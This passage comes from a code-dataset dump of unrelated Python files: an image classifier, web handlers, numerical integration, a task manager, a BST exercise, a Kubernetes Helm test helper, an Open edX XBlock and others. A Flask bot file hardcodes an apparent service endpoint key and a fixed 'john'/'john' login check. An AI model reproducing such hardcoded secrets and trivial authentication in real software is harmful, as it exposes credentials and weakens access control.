\"/Users/motchy83/Documents/WorkSpace/GitDir/AreYouAKB/models/model.ckpt\")\n\nu'''\n\b判定\n'''\ndef main2():\n with tf.Graph().as_default():\n test_images, test_labels, filenames = load_data('experiment')\n x = tf.placeholder('float', shape=[None, 32 * 32 * 3]) # 32 * 32, 3 channels\n y_ = tf.placeholder('float', shape=[None, 2]) # 2 classes\n keep_prob = tf.placeholder('float')\n\n y_conv = inference(x, keep_prob)\n\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n saver.restore(sess, \"/Users/motchy83/Documents/WorkSpace/GitDir/AreYouAKB/models/model.ckpt\")\n\n test_images = list(map(lambda _: sess.run(_).astype(np.float32) / 255.0, np.asarray(test_images)))\n\n idn = 0\n Akb = 0\n Saka = 0\n for filename in filenames:\n # print (filename)\n print (y_conv.eval(feed_dict={ x: [test_images[idn]], keep_prob: 1.0 })[0])\n if 0 == np.argmax(y_conv.eval(feed_dict={ x: [test_images[idn]], keep_prob: 1.0 })[0]):\n print(filename + \":AKB\")\n Akb += 1\n else:\n print(filename + \":SAKA\")\n Saka += 1\n idn += 1\n \n print(Akb/idn)\n print(Saka/idn)\n \n\nu'''\nここから開始する\n'''\nif __name__ == '__main__':\n args = sys.argv\n if len(args) == 1:\n main2()\n elif \"Learn\" == args[1]:\n main()\n else:\n main2()\n\n","sub_path":"CNN_Learn.py","file_name":"CNN_Learn.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"166618873","text":"import json\nfrom aiohttp import web\nimport aiopg\n\nfrom async_db import get_row, get_pool\n\n\nasync def 
handle(request):\n a, b = await get_row()\n return web.Response(text=json.dumps({\n \"a\": str(a).zfill(10),\n \"b\": b\n }))\n\n\nasync def close_db(app_):\n pool = await get_pool()\n pool.close()\n await pool.wait_closed()\n\n\napp = web.Application()\napp.on_shutdown.append(close_db)\napp.add_routes([web.get('/test', handle)])\n","sub_path":"app_aio.py","file_name":"app_aio.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"215458083","text":"from math import sqrt, sin\n\ndef f1(x):\n return 1 / sqrt(2 + 0.5 * x**2)\n\n\na = 0.4\nb = 1.2\nn = 10\n\ndef f2(x):\n return sin(2*x) / x**2\n\n\ndef drange(start, stop, step):\n r = start\n while r <= stop:\n yield r\n r += step\n\n\ndef trap(func, a, b, n):\n \"\"\" Computes an integral of func from a to b using the composite trapezoidal rule. \"\"\"\n xs = [x for x in drange(a, b, (b-a) / n)]\n ys = [func(x) for x in xs]\n res = sum([(ys[i] + ys[i+1]) * (xs[i+1] - xs[i]) / 2 for i in range(n)])\n return res, len(xs), n\n\n\ndef simpson(f, start, stop, n):\n res = 0\n i = (stop - start) / n\n a = start\n b = start + i\n while b <= stop:\n res += (b-a) * (f(a) + 4 * f((a + b) / 2) + f(b)) / 6\n a += i\n b += i\n return res\n\n\nif __name__ == '__main__':\n print(\"Trapezoidal rule: \")\n print(trap(f1, a, b, n))\n\n print(\"=\" * 20 + \"\\n\")\n print(\"Simpson's rule: \")\n print(simpson(f2, 0.8, 1.2, 80))\n","sub_path":"int1.py","file_name":"int1.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
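A quick sanity check for the two quadrature routines above; a minimal sketch that assumes int1.py is importable as a module, with illustrative integrands and tolerances that are not part of the original script. Simpson's rule is exact for cubic polynomials and the trapezoidal rule is exact for linear functions, so no external reference values are needed.

from int1 import trap, simpson

# Simpson's rule integrates cubics exactly: the integral of x**3 over [0, 1] is 1/4.
assert abs(simpson(lambda x: x**3, 0.0, 1.0, 4) - 0.25) < 1e-12

# The trapezoidal rule is exact for linear functions: the integral of x over [0, 1] is 1/2.
res, n_points, n = trap(lambda x: x, 0.0, 1.0, 10)
assert abs(res - 0.5) < 1e-9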
+{"seq_id":"604837119","text":"from dateutil.relativedelta import relativedelta\nfrom datetime import datetime\nfrom prosys.model.task import Task, TaskChunk\nfrom prosys.use_cases.response import Response\nfrom schema import Schema, Optional, Or\n\n\nclass TaskInteractor(object):\n \"\"\"docstring for TaskInteractor\"\"\"\n\n def __init__(self, repo):\n self.repo = repo\n self.schema = Schema({\n Optional('id'): Or(int, str, None),\n Optional('master_task_id'): Or(int, str, None),\n Optional('project_id'): Or(str, int),\n Optional('name'): str,\n Optional('prio'): int,\n Optional('scheduled'): {\n 'date': str,\n Optional('freq'): str,\n Optional('repeat_limit'): int\n }\n })\n\n def get_tasks(self, filters=None, hierarchy=False):\n response = Response()\n tasks = self.repo.get_tasks()\n by_id = False\n if isinstance(filters, dict):\n by_id = 'id' in filters and filters['id'] is not None\n if by_id:\n tasks = self.repo.get_task_by_id(filters['id'])\n else:\n if ('date_begin' in filters and 'date_end' in filters):\n sort_by_date = 'sort_date' in filters\n tasks = self.get_tasks_between_dates(\n filters['date_begin'],\n filters['date_end'], sort_by_date)\n tasks = self.filtered_tasks(tasks, filters)\n if not hierarchy or by_id:\n response.value = tasks\n else:\n response.value = self._structure_tasks(tasks)\n return response\n\n def _structure_tasks(self, tasks):\n project_tasks = {}\n for task in tasks:\n if task.project.id not in project_tasks:\n project_tasks[task.project.id] = []\n project_tasks[task.project.id].append(task)\n return project_tasks\n\n def filtered_tasks(self, tasks, filters):\n return [task for task in tasks if\n task.name == filters.get('name', task.name) and\n task.project.id == filters.get('project_id',\n task.project.id) and\n task.prio == filters.get('prio', task.prio) and\n task.started == filters.get('started', task.started) and\n task.done == filters.get('done', task.done)]\n\n def get_tasks_between_dates(self, date_begin, date_end, sort=False):\n tasks = self.repo.get_tasks()\n delta = date_end - date_begin\n dates = [date_begin + relativedelta(\n days=i) for i in range(abs(delta.days) + 1)]\n tasks = [task for task in tasks if any(\n self._task_occurs_on_date(date, task) for date in dates)]\n if sort:\n tasks.sort(key=lambda task: task.scheduled.date)\n return tasks\n\n def get_task_history(self, date_begin, date_end, sort=True):\n resp = Response()\n if date_begin is None or date_end is None:\n resp.add_error({'missing param':\n 'begin date or end date is missing'})\n return resp\n if isinstance(date_begin, datetime):\n date_begin = date_begin.date()\n if isinstance(date_end, datetime):\n date_end = date_end.date()\n chunks = self.repo.get_task_chunks()\n chunks = [chunk for chunk in chunks if\n chunk.started.date() >= date_begin and\n chunk.started.date() <= date_end]\n if sort:\n chunks.sort(key=lambda chunk: chunk.started)\n resp.value = chunks\n return resp\n\n def _task_occurs_on_date(self, date, task):\n sd = task.scheduled_day()\n if sd is None:\n return False\n if sd == date:\n return True\n if sd > date:\n return False\n freq = task.scheduled.freq\n if freq is None:\n return False\n # if occurs every day\n if freq == relativedelta(days=1):\n return True\n # if occurs every week and same day\n if sd.weekday() == date.weekday() and freq == relativedelta(weeks=1):\n return True\n if freq == relativedelta(weekday=date.weekday()):\n return True\n # every n days\n if relativedelta(days=freq.days) == freq and freq.days > 0:\n diff = relativedelta(sd, date)\n n = diff / freq.days\n if n * freq.days == diff:\n return True\n # if occurs every n months, same day\n if relativedelta(months=freq.months) == freq and freq.months > 0:\n diff = relativedelta(sd, date)\n n = diff / freq.months\n if n * freq.months == diff:\n return True\n return False\n\n def save_task(self, task_req):\n response = Response()\n task = None\n master_task_id = task_req.get('master_task_id', None)\n try:\n # Editing an existing task\n if 'id' in task_req and task_req['id'] is not None:\n task = self.repo.get_task_by_id(task_req['id'])\n if task is None:\n response.add_error({'invalid param': 'task id not found'})\n else:\n self._edit_task(task, task_req)\n # Creating new task\n else:\n if ('project_id' not in task_req and\n 'master_task_id' not in task_req):\n response.add_error({\n 'missing param':\n 'project_id and master_task_id is missing'})\n else:\n if 'project_id' in task_req:\n task_req['project'] = self.repo.get_project_by_id(\n task_req['project_id'])\n else:\n master_task = self.repo.get_task_by_id(master_task_id)\n task_req['prio'] = master_task.prio\n task_req['project'] = master_task.id\n if task_req['project'] is None:\n response.add_error({'invalid param':\n 'project not found'})\n else:\n task = Task.from_dict(task_req)\n except KeyError as e:\n response.add_error({'missing param': e.args[0] + ' is missing'})\n\n if not response:\n return response\n\n response = self._validate_task(task)\n if response:\n self.repo.save_task(task, self.repo.get_task_by_id(master_task_id))\n response.message = 'task saved'\n return response\n\n def _edit_task(self, task, task_req):\n task.name = task_req.get('name', task.name)\n task.prio = task_req.get('prio', task.prio)\n task.scheduled = task_req.get('scheduled', task.scheduled)\n\n def delete_task(self, task_id):\n response = self._get_task_with_response(task_id)\n if response:\n
self.repo.delete_task(task_id)\n response.message = 'task deleted'\n return response\n\n def _exec_task_fn(self, task_id, fn, message):\n response = self._get_task_with_response(task_id)\n if response:\n fn(response.value)\n response.message = message\n self.repo.save_task(response.value)\n return response\n\n def complete_task(self, task_id):\n resp = self._exec_task_fn(task_id, Task.complete, 'task completed')\n if resp and resp.value.scheduled_day() is None:\n self.repo.delete_task(task_id)\n return resp\n\n def postpone_task(self, task_id):\n return self._exec_task_fn(task_id, Task.postpone, 'task postponed')\n\n def start_task(self, task_id):\n return self._exec_task_fn(task_id, Task.start, 'task started')\n\n def stop_task(self, task_id):\n res = self._get_task_with_response(task_id)\n if not res:\n return res\n task_chunk = None\n task = res.value\n if task.started:\n task_chunk = TaskChunk(task, task.start_time, datetime.now())\n self.repo.save_task_chunk(task_chunk)\n task.stop()\n self.repo.save_task(task)\n res.message = 'task stopped'\n return res\n\n def _validate_task(self, task):\n response = Response()\n if task.prio < 1 or task.prio > 5:\n response.add_error({'invalid param':\n 'priority must be between 1 and 5'})\n if response:\n response.value = task\n return response\n\n def _get_task_with_response(self, task_id):\n response = Response()\n task = self.repo.get_task_by_id(task_id)\n if task is None:\n response.add_error({'invalid param': 'task id not found'})\n else:\n response.value = task\n return response\n","sub_path":"prosys.server/prosys/use_cases/task_interactor.py","file_name":"task_interactor.py","file_ext":"py","file_size_in_byte":8917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"527714935","text":"\"\"\"\n173. Binary Search Tree Iterator\nMedium\n\nImplement an iterator over a binary search tree (BST). Your iterator will be initialized with the root node of a BST.\n\nCalling next() will return the next smallest number in the BST.\n\nExample:\n\nBSTIterator iterator = new BSTIterator(root);\niterator.next(); # return 3\niterator.next(); # return 7\niterator.hasNext(); # return true\niterator.next(); # return 9\niterator.hasNext(); # return true\niterator.next(); # return 15\niterator.hasNext(); # return true\niterator.next(); # return 20\niterator.hasNext(); # return false\n\nNote:\n\nnext() and hasNext() should run in average O(1) time and use O(h) memory, where h is the height of the tree.\n\"\"\"\nclass Node:\n def __init__(self, data):\n self.val = data\n self.left = None\n self.right = None\n\nclass BSTIterator:\n def __init__(self, data):\n self.root = Node(data)\n self.stack = []\n\n def in_order_traversal(self, start):\n if start:\n self.in_order_traversal(start.left)\n self.stack.append(start.val)\n self.in_order_traversal(start.right)\n\n def print_tree(self):\n node = self.root\n self.in_order_traversal(node)\n return self\n\n def hasNext(self):\n return len(self.stack) != 0\n\n def next(self):\n if self.hasNext():\n next_item = self.stack.pop(0)\n return next_item\n return -1\n\n\ntree = BSTIterator(7)\ntree.root.left = Node(3)\ntree.root.right = Node(15)\ntree.root.right.left = Node(9)\ntree.root.right.right = Node(20)\n\niterator = tree.print_tree()\nprint(iterator.next()); # return 3\nprint(iterator.next()); # return 7\nprint(iterator.hasNext()); # return true\nprint(iterator.next()); # return 9\nprint(iterator.hasNext()); # return true\nprint(iterator.next()); # return 15\nprint(iterator.hasNext()); # return true\nprint(iterator.next()); # return 20\nprint(iterator.hasNext()); # return false\n\n\"\"\"\n3\n7\nTrue\n9\nTrue\n15\nTrue\n20\nFalse\n\"\"\"","sub_path":"fb/binary_tree_itertor_1.py","file_name":"binary_tree_itertor_1.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
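The solution above flattens the whole tree into a list before iteration, which costs O(n) memory. The variant the problem statement actually asks for keeps only the current left spine on a stack, using O(h) memory with O(1) amortized next(). A minimal sketch, not the original author's code; the Node class mirrors the one in the snippet above.

class Node:
    # Same shape as the Node class in the snippet above.
    def __init__(self, data):
        self.val = data
        self.left = None
        self.right = None

class StackBSTIterator:
    """In-order iterator holding at most one root-to-leaf path (O(h) memory)."""

    def __init__(self, root):
        self.stack = []
        self._push_left(root)

    def _push_left(self, node):
        # Descend to the leftmost node, remembering the path.
        while node:
            self.stack.append(node)
            node = node.left

    def hasNext(self):
        return len(self.stack) != 0

    def next(self):
        node = self.stack.pop()
        # The in-order successor is the leftmost node of the right subtree.
        self._push_left(node.right)
        return node.val

root = Node(7)
root.left = Node(3)
root.right = Node(15)
it = StackBSTIterator(root)
print([it.next() for _ in range(3)])  # [3, 7, 15]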
+{"seq_id":"569623622","text":"import os\n\nfrom scale import constants\nfrom utils.util_log import test_log as log\nfrom common import common_func as cf\n\n\ndef get_milvus_chart_env_var(var=constants.MILVUS_CHART_ENV):\n \"\"\" get log path for testing \"\"\"\n try:\n milvus_helm_chart = os.environ[var]\n return str(milvus_helm_chart)\n except Exception as e:\n log.error(f'Failed to get environment variables {var}, with exception {str(e)}')\n\n\nclass HelmEnv:\n milvus_chart_path = get_milvus_chart_env_var()\n\n def __init__(self, release_name=None, **kwargs):\n self.release_name = release_name if release_name else cf.gen_unique_str(constants.DEFAULT_RELEASE_PREFIX)\n self.proxy = kwargs.get(constants.PROXY, 1)\n self.data_node = kwargs.get(constants.DATA_NODE, 1)\n self.index_node = kwargs.get(constants.INDEX_NODE, 1)\n self.query_node = kwargs.get(constants.QUERY_NODE, 1)\n\n def helm_install_cluster_milvus(self, image_pull_policy=constants.IF_NOT_PRESENT):\n \"\"\"\n default deploy cluster milvus with only one xxxNode\n helm install --wait --timeout 180s --set image.all.repository=milvusdb/milvus-dev --set image.all.tag=master-latest\n --set cluster.enabled=true --set service.type=LoadBalancer\n --set image.all=Always clu-zong .\n :param image_pull_policy: image pullPolicy includes: IF_NOT_PRESENT and ALWAYS\n :param kwargs: PROXY, DATA_NODE, INDEX_NODE, QUERY_NODE\n :return: svc ip\n \"\"\"\n install_cmd = f'helm install --wait 
--timeout 360s ' \\\n f'--set image.all.repository={constants.IMAGE_REPOSITORY} ' \\\n f'--set image.all.tag={constants.IMAGE_TAG} ' \\\n f'--set cluster.enabled=true ' \\\n f'--set service.type=LoadBalancer ' \\\n f'--set image.all.pullPolicy={image_pull_policy} ' \\\n f'--set proxy.replicas={self.proxy} ' \\\n f'--set dataNode.replicas={self.data_node} ' \\\n f'--set indexNode.replicas={self.index_node} ' \\\n f'--set queryNode.replicas={self.query_node} ' \\\n f'{self.release_name} . '\n log.debug(f'install_cmd: {install_cmd}')\n try:\n os.system(f'cd {self.milvus_chart_path} && {install_cmd}')\n except Exception:\n raise Exception(\"Failed to deploy cluster milvus\")\n return self.get_service_ip()\n\n def helm_upgrade_cluster_milvus(self, **kwargs):\n \"\"\"\n scale milvus pod num by helm upgrade\n when upgrading pod nums, other --set need to be the same as helm install\n :param kwargs: PROXY, DATA_NODE, INDEX_NODE, QUERY_NODE\n :return: None\n \"\"\"\n proxy = kwargs.get(constants.PROXY, self.proxy)\n data_node = kwargs.get(constants.DATA_NODE, self.data_node)\n index_node = kwargs.get(constants.INDEX_NODE, self.index_node)\n query_node = kwargs.get(constants.QUERY_NODE, self.query_node)\n upgrade_cmd = f'helm upgrade {self.release_name} . ' \\\n f'--set proxy.replicas={proxy} ' \\\n f'--set dataNode.replicas={data_node} ' \\\n f'--set indexNode.replicas={index_node} ' \\\n f'--set queryNode.replicas={query_node} ' \\\n f'--reuse-values'\n log.debug(f'upgrade_cmd: {upgrade_cmd}')\n if os.system(f'cd {self.milvus_chart_path} && {upgrade_cmd}'):\n raise Exception(f'Failed to upgrade cluster milvus with {kwargs}')\n\n def helm_uninstall_cluster_milvus(self):\n \"\"\"\n helm uninstall and delete etcd pvc\n :return:\n \"\"\"\n uninstall_cmd = f'helm uninstall {self.release_name}'\n if os.system(uninstall_cmd):\n raise Exception(f'Failed to uninstall {self.release_name}')\n # delete etcd pvc\n delete_pvc_cmd = f'kubectl delete pvc data-{self.release_name}-etcd-0'\n if os.system(delete_pvc_cmd):\n raise Exception(f'Failed to delete {self.release_name} etcd pvc')\n\n def get_service_ip(self):\n \"\"\"\n get deployed milvus service host\n :return: str ip\n \"\"\"\n from kubernetes import client, config\n # from kubernetes.client.rest import ApiException\n config.load_kube_config()\n v1 = client.CoreV1Api()\n service = v1.read_namespaced_service(f'{self.release_name}-milvus', constants.NAMESPACE)\n return service.status.load_balancer.ingress[0].ip\n\n def export_all_logs(self):\n \"\"\"\n export all cluster logs to /tmp/milvus, and temporarily missing minio pod logs\n :return: export all pods' log to constants.MILVUS_LOGS_PATH\n \"\"\"\n pods = self.list_all_pods()\n for pod in pods:\n os.system(f'kubectl logs {pod} > {constants.MILVUS_LOGS_PATH}/{pod}.log 2>&1')\n\n def list_all_pods(self):\n \"\"\"\n list all pods of this release\n :return: list pods\n \"\"\"\n from kubernetes import client, config\n config.load_kube_config()\n v1 = client.CoreV1Api()\n label_selector = f'app.kubernetes.io/instance={self.release_name}'\n ret = v1.list_namespaced_pod(namespace=constants.NAMESPACE, label_selector=label_selector)\n pods = []\n for i in ret.items:\n pods.append(i.metadata.name)\n return pods\n\n\nif __name__ == '__main__':\n # default deploy q replicas\n release_name = \"scale-proxy\"\n env = HelmEnv(release_name=release_name)\n # env.helm_install_cluster_milvus()\n # host = env.get_service_ip()\n # env.helm_upgrade_cluster_milvus(queryNode=2)\n # env.helm_uninstall_cluster_milvus()\n 
env.export_all_logs()\n","sub_path":"tests/python_client/scale/helm_env.py","file_name":"helm_env.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"489590177","text":"#!/usr/bin/python3\ndef contaVogais(palavra):\n total = 0\n \n for letra in palavra:\n if letra in \"aeiouAEIOU\":\n total += 1\n return total\n\ndef maiorPalavra(lista):\n\ttam,maior = 0,''\n\t\n\tfor x in lista:\n\t\tif len(x) > tam:\n\t\t\ttam = len(x)\n\t\t\tmaior = x\n\treturn maior\n\ndef contaPalindromos(lista):\n total = 0\n \n for p in lista:\n if p == p[::-1]:\n total += 1\n \n return total\n\ndef main():\n\tpalavras,totalVogais,totalDigitos,aux = [],0,0,'teste'\n\t\n\twhile(aux != ''):\n\t\tprint(\"Para encerrar, aperte a tecla .\")\n\t\taux = input(\"Digite alguma coisa: \")\n\t\t\n\t\tif aux != '':\n\t\t\ttotalVogais += contaVogais(aux)\n\t\t\ttotalDigitos += len(aux)\n\t\t\tpalavras.append(aux)\n\t\n\tprint()\n\tprint(\"============== RELATÓRIO ==============\")\n\tprint()\n\tprint(\"Palavras:\",palavras)\n\tprint()\n\tprint(\"Total de vogais:\",totalVogais)\n\tprint()\n\tprint(\"Total de dígitos:\",totalDigitos)\n\tprint()\n\tprint(\"Maior palavra digitada:\",maiorPalavra(palavras))\n\tprint()\n\tprint(\"Quantidade de palavras palíndromas:\",contaPalindromos(palavras))\n\nif __name__ == '__main__':\n\tmain()","sub_path":"questao2.py","file_name":"questao2.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"371512981","text":"import http.client\r\nimport urllib.parse\r\nimport json\r\nimport time\r\nimport re\r\n\r\nfrom flask import Flask, jsonify, render_template, request\r\n\r\napplication = Flask(__name__)\r\nhost = \"jonhlegal.azurewebsites.net\"\r\nendpoint_key = \"ad3bbe8d-0074-4911-a2ff-8b0914a11623\"\r\nkb = \"98d8aa51-8b03-440d-b66d-933db6f17e37\"\r\nmethod = \"/qnamaker/knowledgebases/\" + kb + \"/generateAnswer\"\r\n\r\n\r\ndef pretty_print(content):\r\n return json.dumps(json.loads(content), indent=4)\r\n\r\n\r\ndef get_answers(path, content):\r\n headers = {\r\n 'Authorization': 'EndpointKey ' + endpoint_key,\r\n 'Content-Type': 'application/json',\r\n 'Content-Length': len(content)\r\n }\r\n conn = http.client.HTTPSConnection(host)\r\n conn.request(\"POST\", path, content, headers)\r\n response = conn.getresponse()\r\n return response.read()\r\n\r\n\r\ndef put_question(text):\r\n question = {\"question\": text}\r\n content = json.dumps(question)\r\n result = get_answers(method, content)\r\n # print(pretty_print(result))\r\n info = json.loads(result)\r\n # print(info.keys())\r\n if float(info[\"answers\"][0][\"score\"]) < 30.0:\r\n return \"Sobre essa questão ainda não tenho entendimento, me dê um tempinho para aprender e depois eu respondo para você.\"\r\n else:\r\n return info[\"answers\"][0][\"answer\"]\r\n\r\n\r\n@application.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n if request.method == \"POST\":\r\n username = request.form[\"username\"]\r\n password = request.form[\"password\"]\r\n if username == \"john\" and password == \"john\":\r\n return render_template(\"index.html\")\r\n return render_template(\"login.html\")\r\n\r\n\r\n@application.route(\"/ask/\", methods=[\"GET\"])\r\ndef ask(message):\r\n return jsonify(put_question(message))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 
application.run()\r\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"145587780","text":"# -*- coding: UTF-8 -*-\n\"\"\"TO-DO: Write a description of what this XBlock is.\"\"\"\n\nimport pkg_resources\nimport os\nfrom mako.template import Template\nfrom xblock.core import XBlock\nfrom xblock.fields import Scope, Integer, String, Boolean, Dict\nfrom xblock.fragment import Fragment\nimport urllib\n\n# dict_key_url = {\n# \"sudoku\":u\"九宫格(暖场游戏)\",\n# \"challenge_memory\":u\"挑战记忆(暖场游戏)\",\n# \"who_is_a_close_friend\":u\"谁是密友(暖场游戏)\",\n# \"tokyo_tower\":u\"东京铁塔(沟通游戏)\",\n# \"picasso\":u\"毕加索(沟通游戏)\",\n# \"plane_crashed\":u\"飞机坠落(沟通游戏)\",\n# \"one_yuan_a_few_house\":u\"一元几豪(思维游戏)\",\n# \"i_laugh_you_cry\":u\"我笑你哭(轻松游戏)\",\n# }\n# dict_key_value = {\n# \"sudoku\":u\"九宫格(暖场游戏)\",\n# \"challenge_memory\":u\"挑战记忆(暖场游戏)\",\n# \"who_is_a_close_friend\":u\"谁是密友(暖场游戏)\",\n# \"tokyo_tower\":u\"东京铁塔(沟通游戏)\",\n# \"picasso\":u\"毕加索(沟通游戏)\",\n# \"plane_crashed\":u\"飞机坠落(沟通游戏)\",\n# \"one_yuan_a_few_house\":u\"一元几豪(思维游戏)\",\n# \"i_laugh_you_cry\":u\"我笑你哭(轻松游戏)\",\n# }\nclass GameXBlock(XBlock):\n \"\"\"\n TO-DO: document what your XBlock does.\n \"\"\"\n\n # Fields are defined on the class. You can access them in your code as\n # self..\n\n # TO-DO: delete count, and define your own fields.\n display_name = String(display_name=\"Display Name\",\n default=u\"游戏\",\n scope=Scope.settings,\n help=\"This name appears in the horizontal navigation at the top of the page.\")\n\n image_url = String(display_name=\"Display Name\",\n default=\"\",\n scope=Scope.content,\n help=\"This name appears in the horizontal navigation at the top of the page.\")\n\n # func_key = String(display_name=\"\",\n # default=\"\",\n # scope=Scope.content,\n # help=\"\")\n\n func_url = String(display_name=\"\",\n default=\"\",\n scope=Scope.content,\n help=\"\")\n\n # tour_content = Dict(display_name=\"file classify\",\n # default=dict_key_value,\n # scope=Scope.content,\n # help=\"setting file classify.\")\n\n\n # TO-DO: change this view to display your data your own way.\n def student_view(self, context=None):\n \"\"\"\n The primary view of the GameXBlock, shown to students\n when viewing courses.\n \"\"\"\n Url_Root = os.path.dirname(__file__) \n mako_template = Template(filename=Url_Root+\"/static/html/game_view.html\")\n # if self.image_url:\n # image_url= self.image_url\n # else:\n # image_url = self.runtime.local_resource_url(self, 'public/images/u40.png')\n html_str = mako_template.render_unicode(\n display_name= self.display_name,\n image_url= self.image_url,\n )\n frag = Fragment(html_str)\n css_template = Template(filename=Url_Root+\"/static/css/game.css\")\n frag.add_css(css_template.render_unicode())\n javascript_template = Template(filename=Url_Root+\"/static/js/src/game_view.js\")\n frag.add_javascript(javascript_template.render_unicode())\n frag.initialize_js('GameXBlockView')\n return frag\n\n # TO-DO: change this handler to perform your own actions. 
You may need more\n # than one handler, or you may not need any handlers at all.\n def studio_view(self, context=None):\n \"\"\"\n The secondary view of the XBlock, shown to teachers\n when editing the XBlock.\n \"\"\"\n Url_Root = os.path.dirname(__file__) \n mako_template = Template(filename=Url_Root+\"/static/html/game_edit.html\") \n html_str = mako_template.render_unicode(\n display_name= self.display_name,\n # tour_content=self.tour_content,\n # func_key = self.func_key,\n )\n frag = Fragment(html_str)\n javascript_template = Template(filename=Url_Root+\"/static/js/src/game_edit.js\")\n frag.add_javascript(javascript_template.render_unicode())\n frag.initialize_js('GameXBlockEdit')\n return frag\n\n @XBlock.json_handler\n def save_game(self, data, suffix=''):\n \"\"\"\n The saving handler.\n \"\"\"\n # dict_image_url = {\n # \"sudoku\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"challenge_memory\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"who_is_a_close_friend\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"tokyo_tower\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"picasso\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"plane_crashed\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"one_yuan_a_few_house\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"i_laugh_you_cry\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # }\n self.display_name= data[\"display_name\"]\n # self.func_key = data[\"content_key\"]\n self.func_url = \"portal/large_screen/teach/game.jsp\"\n self.image_url = self.runtime.local_resource_url(self, 'public/images/game.png')\n return {\n 'result': 'success',\n }\n\n # TO-DO: change this to create the scenarios you'd like to see in the\n # workbench while developing your XBlock.\n @staticmethod\n def workbench_scenarios():\n \"\"\"A canned scenario for display in the workbench.\"\"\"\n return [\n (\"GameXBlock\",\n \"\"\"\n \n \n \n \n \"\"\"),\n ]\n","sub_path":"game/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"320262219","text":"\r\nfrom django.contrib import admin\r\nfrom django.urls import path\r\nfrom mysite import view\r\nfrom . 
import view\r\nurlpatterns = [\r\n path('admin/', admin.site.urls),\r\n path('', view.index, name='index'),\r\n path('index', view.index, name='index'),\r\n # path('', view.register)\r\n path('register', view.register, name='register'),\r\n path('view', view.view, name='view'),\r\n path('delete/', view.delete),\r\n path('edit/', view.edit),\r\n path('update/', view.update)\r\n]\r\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"114247876","text":"from orm.services.flavor_manager.fms_rest.data.sql_alchemy import db_models\nfrom orm.services.flavor_manager.fms_rest.data.wsme import models\n\nfrom orm.tests.unit.fms import FunctionalTest\n\n\nclass TestWsmeModels(FunctionalTest):\n def test_flavor_wrapper_from_db_model(self):\n\n sql_flavor = db_models.Flavor()\n sql_flavor.description = 'desc'\n sql_flavor.disk = 1\n sql_flavor.ephemeral = 1\n sql_flavor.flavor_extra_specs = [db_models.FlavorExtraSpec('key1', 'val1'),\n db_models.FlavorExtraSpec('key2', 'val2')]\n sql_flavor.flavor_tag = [db_models.FlavorExtraSpec('key1', 'val1'),\n db_models.FlavorExtraSpec('key2', 'val2')]\n sql_flavor.flavor_options = [db_models.FlavorExtraSpec('key1', 'val1'),\n db_models.FlavorExtraSpec('key2', 'val2')]\n sql_flavor.flavor_regions = [db_models.FlavorRegion('region1'),\n db_models.FlavorRegion('region2')]\n sql_flavor.flavor_tenants = [db_models.FlavorTenant('tenant1'),\n db_models.FlavorTenant('tenant2')]\n sql_flavor.id = 'id'\n sql_flavor.internal_id = 1\n sql_flavor.ram = 1\n sql_flavor.visibility = 'visibility'\n sql_flavor.vcpus = 1\n sql_flavor.series = \"p1\"\n sql_flavor.swap = 1\n sql_flavor.disk = 1\n sql_flavor.name = 'name'\n\n wsme_flavors = models.FlavorWrapper.from_db_model(sql_flavor)\n\n self.assertEqual(len(wsme_flavors.flavor.regions), 2)\n self.assertEqual(len(wsme_flavors.flavor.tenants), 2)\n self.assertEqual(wsme_flavors.flavor.extra_specs['key1'], 'val1')\n self.assertEqual(wsme_flavors.flavor.extra_specs['key2'], 'val2')\n\n def test_flavor_wrapper_to_db_model(self):\n flavor_wrapper = models.FlavorWrapper()\n flavor_wrapper.flavor = models.Flavor()\n\n flavor_wrapper.flavor.description = 'desc'\n flavor_wrapper.flavor.disk = '1'\n flavor_wrapper.flavor.ephemeral = '1'\n flavor_wrapper.flavor.extra_specs = {'key1': 'val1', 'key2': 'val2'}\n flavor_wrapper.flavor.tag = {'key1': 'val1', 'key2': 'val2'}\n flavor_wrapper.flavor.options = {'key1': 'val1', 'key2': 'val2'}\n flavor_wrapper.flavor.regions = [models.Region('region1'),\n models.Region('region2')]\n flavor_wrapper.flavor.tenants = ['tenant1', 'tenant2']\n flavor_wrapper.flavor.id = 'id'\n flavor_wrapper.flavor.ram = '1'\n flavor_wrapper.flavor.visibility = 'visibility'\n flavor_wrapper.flavor.vcpus = '1'\n flavor_wrapper.flavor.swap = '1'\n flavor_wrapper.flavor.disk = '1'\n flavor_wrapper.flavor.name = 'name'\n 